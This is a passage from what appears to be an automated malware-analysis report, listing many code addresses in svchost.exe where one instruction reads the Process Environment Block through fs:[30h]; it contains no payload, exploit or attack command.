              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930670 mov eax, dword ptr fs:[00000030h]1_2_03930670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972670 mov eax, dword ptr fs:[00000030h]1_2_03972670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972670 mov eax, dword ptr fs:[00000030h]1_2_03972670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396666D mov esi, dword ptr fs:[00000030h]1_2_0396666D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396666D mov eax, dword ptr fs:[00000030h]1_2_0396666D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396666D mov eax, dword ptr fs:[00000030h]1_2_0396666D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE660 mov eax, dword ptr fs:[00000030h]1_2_039BE660
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962594 mov eax, dword ptr fs:[00000030h]1_2_03962594
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC592 mov eax, dword ptr fs:[00000030h]1_2_039BC592
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE588 mov eax, dword ptr fs:[00000030h]1_2_039AE588
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE588 mov eax, dword ptr fs:[00000030h]1_2_039AE588
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A580 mov eax, dword ptr fs:[00000030h]1_2_0396A580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A580 mov eax, dword ptr fs:[00000030h]1_2_0396A580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039345B0 mov eax, dword ptr fs:[00000030h]1_2_039345B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039345B0 mov eax, dword ptr fs:[00000030h]1_2_039345B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B85AA mov eax, dword ptr fs:[00000030h]1_2_039B85AA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039665D0 mov eax, dword ptr fs:[00000030h]1_2_039665D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5C6 mov eax, dword ptr fs:[00000030h]1_2_0396C5C6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05C6 mov eax, dword ptr fs:[00000030h]1_2_039B05C6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC5FC mov eax, dword ptr fs:[00000030h]1_2_039BC5FC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5E7 mov ebx, dword ptr fs:[00000030h]1_2_0396A5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5E7 mov eax, dword ptr fs:[00000030h]1_2_0396A5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE5E0 mov eax, dword ptr fs:[00000030h]1_2_039DE5E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC51D mov eax, dword ptr fs:[00000030h]1_2_039BC51D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932500 mov eax, dword ptr fs:[00000030h]1_2_03932500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C50D mov eax, dword ptr fs:[00000030h]1_2_0396C50D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C50D mov eax, dword ptr fs:[00000030h]1_2_0396C50D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972539 mov eax, dword ptr fs:[00000030h]1_2_03972539
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6550 mov eax, dword ptr fs:[00000030h]1_2_039C6550
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA553 mov eax, dword ptr fs:[00000030h]1_2_039FA553
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E547 mov eax, dword ptr fs:[00000030h]1_2_0394E547
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03966540 mov eax, dword ptr fs:[00000030h]1_2_03966540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968540 mov eax, dword ptr fs:[00000030h]1_2_03968540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393254C mov eax, dword ptr fs:[00000030h]1_2_0393254C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C560 mov eax, dword ptr fs:[00000030h]1_2_0394C560
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC490 mov eax, dword ptr fs:[00000030h]1_2_039BC490
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930485 mov ecx, dword ptr fs:[00000030h]1_2_03930485
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396648A mov eax, dword ptr fs:[00000030h]1_2_0396648A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396648A mov eax, dword ptr fs:[00000030h]1_2_0396648A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396648A mov eax, dword ptr fs:[00000030h]1_2_0396648A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C84BB mov eax, dword ptr fs:[00000030h]1_2_039C84BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E4BC mov eax, dword ptr fs:[00000030h]1_2_0396E4BC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039324A2 mov eax, dword ptr fs:[00000030h]1_2_039324A2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039324A2 mov ecx, dword ptr fs:[00000030h]1_2_039324A2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039644A8 mov eax, dword ptr fs:[00000030h]1_2_039644A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039544D1 mov eax, dword ptr fs:[00000030h]1_2_039544D1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039544D1 mov eax, dword ptr fs:[00000030h]1_2_039544D1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039364F0 mov eax, dword ptr fs:[00000030h]1_2_039364F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D44F8 mov eax, dword ptr fs:[00000030h]1_2_039D44F8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D44F8 mov eax, dword ptr fs:[00000030h]1_2_039D44F8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A4F0 mov eax, dword ptr fs:[00000030h]1_2_0396A4F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A4F0 mov eax, dword ptr fs:[00000030h]1_2_0396A4F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE4F2 mov eax, dword ptr fs:[00000030h]1_2_039BE4F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE4F2 mov eax, dword ptr fs:[00000030h]1_2_039BE4F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E4EF mov eax, dword ptr fs:[00000030h]1_2_0396E4EF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E4EF mov eax, dword ptr fs:[00000030h]1_2_0396E4EF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6400 mov eax, dword ptr fs:[00000030h]1_2_039C6400
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6400 mov eax, dword ptr fs:[00000030h]1_2_039C6400
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392640D mov eax, dword ptr fs:[00000030h]1_2_0392640D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E45E mov eax, dword ptr fs:[00000030h]1_2_0395E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E45E mov eax, dword ptr fs:[00000030h]1_2_0395E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E45E mov eax, dword ptr fs:[00000030h]1_2_0395E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E45E mov eax, dword ptr fs:[00000030h]1_2_0395E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E45E mov eax, dword ptr fs:[00000030h]1_2_0395E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940445 mov eax, dword ptr fs:[00000030h]1_2_03940445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940445 mov eax, dword ptr fs:[00000030h]1_2_03940445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940445 mov eax, dword ptr fs:[00000030h]1_2_03940445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940445 mov eax, dword ptr fs:[00000030h]1_2_03940445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940445 mov eax, dword ptr fs:[00000030h]1_2_03940445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940445 mov eax, dword ptr fs:[00000030h]1_2_03940445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0443 mov eax, dword ptr fs:[00000030h]1_2_039B0443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938470 mov eax, dword ptr fs:[00000030h]1_2_03938470
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938470 mov eax, dword ptr fs:[00000030h]1_2_03938470
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE461 mov eax, dword ptr fs:[00000030h]1_2_039BE461
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA464 mov eax, dword ptr fs:[00000030h]1_2_039FA464
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8BBE mov eax, dword ptr fs:[00000030h]1_2_039F8BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8BBE mov eax, dword ptr fs:[00000030h]1_2_039F8BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8BBE mov eax, dword ptr fs:[00000030h]1_2_039F8BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8BBE mov eax, dword ptr fs:[00000030h]1_2_039F8BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04BE0 mov eax, dword ptr fs:[00000030h]1_2_03A04BE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D6BDE mov ebx, dword ptr fs:[00000030h]1_2_039D6BDE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D6BDE mov eax, dword ptr fs:[00000030h]1_2_039D6BDE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958BD1 mov eax, dword ptr fs:[00000030h]1_2_03958BD1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958BD1 mov eax, dword ptr fs:[00000030h]1_2_03958BD1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392EBC0 mov eax, dword ptr fs:[00000030h]1_2_0392EBC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4BC0 mov eax, dword ptr fs:[00000030h]1_2_039B4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4BC0 mov eax, dword ptr fs:[00000030h]1_2_039B4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4BC0 mov eax, dword ptr fs:[00000030h]1_2_039B4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4BC0 mov eax, dword ptr fs:[00000030h]1_2_039B4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938B10 mov eax, dword ptr fs:[00000030h]1_2_03938B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938B10 mov eax, dword ptr fs:[00000030h]1_2_03938B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938B10 mov eax, dword ptr fs:[00000030h]1_2_03938B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940B10 mov eax, dword ptr fs:[00000030h]1_2_03940B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940B10 mov eax, dword ptr fs:[00000030h]1_2_03940B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940B10 mov eax, dword ptr fs:[00000030h]1_2_03940B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940B10 mov eax, dword ptr fs:[00000030h]1_2_03940B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB1C mov eax, dword ptr fs:[00000030h]1_2_0395EB1C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CB1E mov eax, dword ptr fs:[00000030h]1_2_0392CB1E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CB20 mov eax, dword ptr fs:[00000030h]1_2_0396CB20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCB20 mov eax, dword ptr fs:[00000030h]1_2_039BCB20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCB20 mov eax, dword ptr fs:[00000030h]1_2_039BCB20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCB20 mov eax, dword ptr fs:[00000030h]1_2_039BCB20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04B67 mov eax, dword ptr fs:[00000030h]1_2_03A04B67
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AB70 mov eax, dword ptr fs:[00000030h]1_2_0393AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AB70 mov eax, dword ptr fs:[00000030h]1_2_0393AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AB70 mov eax, dword ptr fs:[00000030h]1_2_0393AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AB70 mov eax, dword ptr fs:[00000030h]1_2_0393AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AB70 mov eax, dword ptr fs:[00000030h]1_2_0393AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AB70 mov eax, dword ptr fs:[00000030h]1_2_0393AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936B70 mov eax, dword ptr fs:[00000030h]1_2_03936B70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936B70 mov eax, dword ptr fs:[00000030h]1_2_03936B70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936B70 mov eax, dword ptr fs:[00000030h]1_2_03936B70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E6B77 mov eax, dword ptr fs:[00000030h]1_2_039E6B77
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964B79 mov eax, dword ptr fs:[00000030h]1_2_03964B79
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E6A80 mov eax, dword ptr fs:[00000030h]1_2_039E6A80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04AE8 mov eax, dword ptr fs:[00000030h]1_2_03A04AE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940ACE mov eax, dword ptr fs:[00000030h]1_2_03940ACE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940ACE mov eax, dword ptr fs:[00000030h]1_2_03940ACE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4AC2 mov eax, dword ptr fs:[00000030h]1_2_039D4AC2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0AFF mov eax, dword ptr fs:[00000030h]1_2_039B0AFF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0AFF mov eax, dword ptr fs:[00000030h]1_2_039B0AFF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0AFF mov eax, dword ptr fs:[00000030h]1_2_039B0AFF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D0AE0 mov eax, dword ptr fs:[00000030h]1_2_039D0AE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2AE0 mov eax, dword ptr fs:[00000030h]1_2_039D2AE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2AE0 mov eax, dword ptr fs:[00000030h]1_2_039D2AE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950AEB mov eax, dword ptr fs:[00000030h]1_2_03950AEB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950AEB mov eax, dword ptr fs:[00000030h]1_2_03950AEB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950AEB mov eax, dword ptr fs:[00000030h]1_2_03950AEB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930AED mov eax, dword ptr fs:[00000030h]1_2_03930AED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930AED mov eax, dword ptr fs:[00000030h]1_2_03930AED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930AED mov eax, dword ptr fs:[00000030h]1_2_03930AED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AA0E mov eax, dword ptr fs:[00000030h]1_2_0396AA0E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AA0E mov eax, dword ptr fs:[00000030h]1_2_0396AA0E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4A57 mov eax, dword ptr fs:[00000030h]1_2_039B4A57
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4A57 mov eax, dword ptr fs:[00000030h]1_2_039B4A57
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EA40 mov eax, dword ptr fs:[00000030h]1_2_0395EA40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EA40 mov eax, dword ptr fs:[00000030h]1_2_0395EA40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039CAA40 mov eax, dword ptr fs:[00000030h]1_2_039CAA40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039CAA40 mov eax, dword ptr fs:[00000030h]1_2_039CAA40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C98F mov eax, dword ptr fs:[00000030h]1_2_0396C98F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C98F mov eax, dword ptr fs:[00000030h]1_2_0396C98F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C98F mov eax, dword ptr fs:[00000030h]1_2_0396C98F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D0980 mov eax, dword ptr fs:[00000030h]1_2_039D0980
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D0980 mov eax, dword ptr fs:[00000030h]1_2_039D0980
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039689B0 mov edx, dword ptr fs:[00000030h]1_2_039689B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C69B0 mov eax, dword ptr fs:[00000030h]1_2_039C69B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C69B0 mov eax, dword ptr fs:[00000030h]1_2_039C69B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C69B0 mov ecx, dword ptr fs:[00000030h]1_2_039C69B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393E9A0 mov eax, dword ptr fs:[00000030h]1_2_0393E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393E9A0 mov eax, dword ptr fs:[00000030h]1_2_0393E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393E9A0 mov eax, dword ptr fs:[00000030h]1_2_0393E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393E9A0 mov eax, dword ptr fs:[00000030h]1_2_0393E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393E9A0 mov eax, dword ptr fs:[00000030h]1_2_0393E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393E9A0 mov eax, dword ptr fs:[00000030h]1_2_0393E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393E9A0 mov eax, dword ptr fs:[00000030h]1_2_0393E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393E9A0 mov eax, dword ptr fs:[00000030h]1_2_0393E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393E9A0 mov eax, dword ptr fs:[00000030h]1_2_0393E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89A0 mov eax, dword ptr fs:[00000030h]1_2_039B89A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039389C0 mov eax, dword ptr fs:[00000030h]1_2_039389C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039389C0 mov eax, dword ptr fs:[00000030h]1_2_039389C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309F0 mov eax, dword ptr fs:[00000030h]1_2_039309F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039649F0 mov eax, dword ptr fs:[00000030h]1_2_039649F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039649F0 mov eax, dword ptr fs:[00000030h]1_2_039649F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A029CF mov eax, dword ptr fs:[00000030h]1_2_03A029CF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A029CF mov eax, dword ptr fs:[00000030h]1_2_03A029CF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986912 mov eax, dword ptr fs:[00000030h]1_2_03986912
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0492D mov eax, dword ptr fs:[00000030h]1_2_03A0492D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962919 mov eax, dword ptr fs:[00000030h]1_2_03962919
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962919 mov eax, dword ptr fs:[00000030h]1_2_03962919
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0398693A mov eax, dword ptr fs:[00000030h]1_2_0398693A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0398693A mov eax, dword ptr fs:[00000030h]1_2_0398693A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0398693A mov eax, dword ptr fs:[00000030h]1_2_0398693A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F892E mov eax, dword ptr fs:[00000030h]1_2_039F892E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F892E mov eax, dword ptr fs:[00000030h]1_2_039F892E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC920 mov ecx, dword ptr fs:[00000030h]1_2_039AC920
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC920 mov eax, dword ptr fs:[00000030h]1_2_039AC920
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC920 mov eax, dword ptr fs:[00000030h]1_2_039AC920
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC920 mov eax, dword ptr fs:[00000030h]1_2_039AC920
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954955 mov eax, dword ptr fs:[00000030h]1_2_03954955
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954955 mov eax, dword ptr fs:[00000030h]1_2_03954955
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C958 mov eax, dword ptr fs:[00000030h]1_2_0396C958
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C944 mov eax, dword ptr fs:[00000030h]1_2_0396C944
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E94E mov eax, dword ptr fs:[00000030h]1_2_0395E94E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936970 mov eax, dword ptr fs:[00000030h]1_2_03936970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936970 mov eax, dword ptr fs:[00000030h]1_2_03936970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936970 mov eax, dword ptr fs:[00000030h]1_2_03936970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936970 mov eax, dword ptr fs:[00000030h]1_2_03936970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936970 mov eax, dword ptr fs:[00000030h]1_2_03936970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936970 mov eax, dword ptr fs:[00000030h]1_2_03936970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936970 mov eax, dword ptr fs:[00000030h]1_2_03936970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394096B mov eax, dword ptr fs:[00000030h]1_2_0394096B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394096B mov eax, dword ptr fs:[00000030h]1_2_0394096B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E8890 mov eax, dword ptr fs:[00000030h]1_2_039E8890
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E8890 mov eax, dword ptr fs:[00000030h]1_2_039E8890
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B488F mov eax, dword ptr fs:[00000030h]1_2_039B488F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956882 mov eax, dword ptr fs:[00000030h]1_2_03956882
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956882 mov eax, dword ptr fs:[00000030h]1_2_03956882
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956882 mov eax, dword ptr fs:[00000030h]1_2_03956882
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397088E mov eax, dword ptr fs:[00000030h]1_2_0397088E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397088E mov edx, dword ptr fs:[00000030h]1_2_0397088E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397088E mov eax, dword ptr fs:[00000030h]1_2_0397088E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C0 mov eax, dword ptr fs:[00000030h]1_2_039428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C0 mov eax, dword ptr fs:[00000030h]1_2_039428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C0 mov eax, dword ptr fs:[00000030h]1_2_039428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C0 mov eax, dword ptr fs:[00000030h]1_2_039428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C0 mov eax, dword ptr fs:[00000030h]1_2_039428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C0 mov eax, dword ptr fs:[00000030h]1_2_039428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C0 mov eax, dword ptr fs:[00000030h]1_2_039428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428C0 mov eax, dword ptr fs:[00000030h]1_2_039428C0
